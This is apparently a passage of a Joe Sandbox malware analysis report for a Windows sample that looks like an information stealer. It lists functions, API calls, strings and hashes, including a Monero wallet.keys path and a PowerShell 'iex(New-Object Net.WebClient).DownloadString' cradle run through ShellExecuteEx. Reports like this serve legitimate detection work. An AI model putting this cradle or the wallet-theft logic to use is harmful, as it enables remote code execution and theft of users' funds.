                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 3a3b9ee6ad7c4e9b1992eb041d418fb3c7dc28b7a5673b3ba2dd9819af7c8d7c
                          • Instruction ID: 0580d13ca69f7138c22d46f050cbc3e099e930e9e62716ec87d82a76ddcb8be1
                          • Opcode Fuzzy Hash: 3a3b9ee6ad7c4e9b1992eb041d418fb3c7dc28b7a5673b3ba2dd9819af7c8d7c
                          • Instruction Fuzzy Hash: F731E7B4A40218ABDB20CF54DC85BDCB7B4AB48704F5081D9BB09A7281CB706AC58FA9
                          Function 00B08100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,018AF110,00000000,?,00B10E2C,00000000,?,00000000), ref: 00B08130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B08137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B08158
                          • wsprintfA.USER32 ref: 00B081AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2922868504-3474575989
                          • Opcode ID: 0891cfd45e96e95f49737347e5fa7ff989f5b78417fdfd9bd6d5c8b0cdb1ae4f
                          • Instruction ID: d7f138b1a4213a84f6d8e5cc82bf0db97a762e750fb880eeb3d998f64ef49a25
                          • Opcode Fuzzy Hash: 0891cfd45e96e95f49737347e5fa7ff989f5b78417fdfd9bd6d5c8b0cdb1ae4f
                          • Instruction Fuzzy Hash: FD21F9B1A44318ABDB00DFD4DC49FAEBBB8EB48B10F104549F605BB2C0D77859018BA5
                          Function 00B083DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B08426
                          • wsprintfA.USER32 ref: 00B08459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B0847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B0848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B08499
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,018AF170,00000000,000F003F,?,00000400), ref: 00B084EC
                          • lstrlen.KERNEL32(?), ref: 00B08501
                          • RegQueryValueExA.ADVAPI32(00000000,018AEFD8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00B10B34), ref: 00B08599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B08608
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B0861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: e67fbe3f4d6e979edbbf86a7780854c617cfb17963ed1203904ab4c084da742c
                          • Instruction ID: 7dc1756754412d825a8c3637de2ff0d1e4234281c362bbc355f5d7d1cc2ce8bb
                          • Opcode Fuzzy Hash: e67fbe3f4d6e979edbbf86a7780854c617cfb17963ed1203904ab4c084da742c
                          • Instruction Fuzzy Hash: 6121BA71A102189BDB64DB54DC85FE9B7B8FB48700F00C5D9A649A6280DF71AA85CFE4
                          Function 00B07690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B076A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B076AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0189B9C8,00000000,00020119,00000000), ref: 00B076DD
                          • RegQueryValueExA.ADVAPI32(00000000,018AF068,00000000,00000000,?,000000FF), ref: 00B076FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B07708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 3aee043626299482e3fc97699ddbade47266f69385312addc62e64b40c0860bb
                          • Instruction ID: 4af54410c1aff65e7ebab864ae90649ebe7adf5b621f0399809252a041e459b1
                          • Opcode Fuzzy Hash: 3aee043626299482e3fc97699ddbade47266f69385312addc62e64b40c0860bb
                          • Instruction Fuzzy Hash: 50014FB5B44308BBD700DBE8DC4DFA9BBB8EB48701F104099FA45D72D0DAB0A9448B61
                          Function 00B07720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B0773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0189B9C8,00000000,00020119,00B076B9), ref: 00B0775B
                          • RegQueryValueExA.ADVAPI32(00B076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00B0777A
                          • RegCloseKey.ADVAPI32(00B076B9), ref: 00B07784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: ba0230c8744a5675c08ddff66e8934c5705a0be5668a43b6a7adf68199ac9c68
                          • Instruction ID: 93dc711ec852d1effef2da11134f583ff4bdcea3d38023453bd17bc04ad3184b
                          • Opcode Fuzzy Hash: ba0230c8744a5675c08ddff66e8934c5705a0be5668a43b6a7adf68199ac9c68
                          • Instruction Fuzzy Hash: A30117F5B40308BBD700DBE4DC49FAEB7B8EB44701F104599FA45E7391DA715A448B61
                          Function 00AF99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                          • LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 8cb85fb8b331b10ab3b390e5d1b3317f47c98bdc285ce69e3ce55764d3c97d06
                          • Instruction ID: 4c5e8455640d8acb044edd7c3ed127ce959b9f45cc64ccec24cc8ecc1871d15e
                          • Opcode Fuzzy Hash: 8cb85fb8b331b10ab3b390e5d1b3317f47c98bdc285ce69e3ce55764d3c97d06
                          • Instruction Fuzzy Hash: D731D6B4A00209EFDB14DF94D985BAE77B5FF48390F108158F911A7390D778AA42CFA1
                          Function 00B04780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,018AF3E0), ref: 00B047DB
                            • Part of subcall function 00B08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04801
                          • lstrcat.KERNEL32(?,?), ref: 00B04820
                          • lstrcat.KERNEL32(?,?), ref: 00B04834
                          • lstrcat.KERNEL32(?,0189A450), ref: 00B04847
                          • lstrcat.KERNEL32(?,?), ref: 00B0485B
                          • lstrcat.KERNEL32(?,018AE608), ref: 00B0486F
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B08D90: GetFileAttributesA.KERNEL32(00000000,?,00AF1B54,?,?,00B1564C,?,?,00B10E1F), ref: 00B08D9F
                            • Part of subcall function 00B04570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B04580
                            • Part of subcall function 00B04570: RtlAllocateHeap.NTDLL(00000000), ref: 00B04587
                            • Part of subcall function 00B04570: wsprintfA.USER32 ref: 00B045A6
                            • Part of subcall function 00B04570: FindFirstFileA.KERNEL32(?,?), ref: 00B045BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: f2c0a44dd6178277ff74f58cbe3875991ea4303113b86a5719c5a02f4936cab9
                          • Instruction ID: 4652cd1021b325bdec24d9c8b28e5ba5b777e8ea7555525d8ec96ba210edd8ea
                          • Opcode Fuzzy Hash: f2c0a44dd6178277ff74f58cbe3875991ea4303113b86a5719c5a02f4936cab9
                          • Instruction Fuzzy Hash: F23171B2A00308A7CB10FBB4DC85EE977BCAB58700F4045C9B399960C1EE74D7898BA5
                          Function 00B02C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00B02D85
                          Strings
                          • <, xrefs: 00B02D39
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00B02D04
                          • ')", xrefs: 00B02CB3
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00B02CC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: aa14fb1515cc2118c41af410f4272379c7c081730a75c443ff0ce302b72500c0
                          • Instruction ID: 2fac6cf57b9122ea4d721c6df75dea1ba41c7f0178a358cbbe1287f495c4cf49
                          • Opcode Fuzzy Hash: aa14fb1515cc2118c41af410f4272379c7c081730a75c443ff0ce302b72500c0
                          • Instruction Fuzzy Hash: AC419C71D103089ADB14FBA0C896FEDBFB8AF14300F508599E116B61D1DF746A8ACF91
                          Function 00AF9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AF9F41
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 29dc75fcf2165b7376ccc6f1f745236567eb7f6c82203323a3727d5b22898468
                          • Instruction ID: 1b51ebc9d0d5449932eb31310f4ec31d047cadf26b1287ea179f333d630fa574
                          • Opcode Fuzzy Hash: 29dc75fcf2165b7376ccc6f1f745236567eb7f6c82203323a3727d5b22898468
                          • Instruction Fuzzy Hash: 8A615E70A1030CEBDB24EFA4DD96FED77B5AF54304F408458FA0A5B291EB706A45CB52
                          Function 00B040B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,018AE628,00000000,00020119,?), ref: 00B040F4
                          • RegQueryValueExA.ADVAPI32(?,018AF4B8,00000000,00000000,00000000,000000FF), ref: 00B04118
                          • RegCloseKey.ADVAPI32(?), ref: 00B04122
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04147
                          • lstrcat.KERNEL32(?,018AF5A8), ref: 00B0415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: dd8b406df14117b40a66442ff046d7e80d96a7e7220d95f88e39ac408fcda273
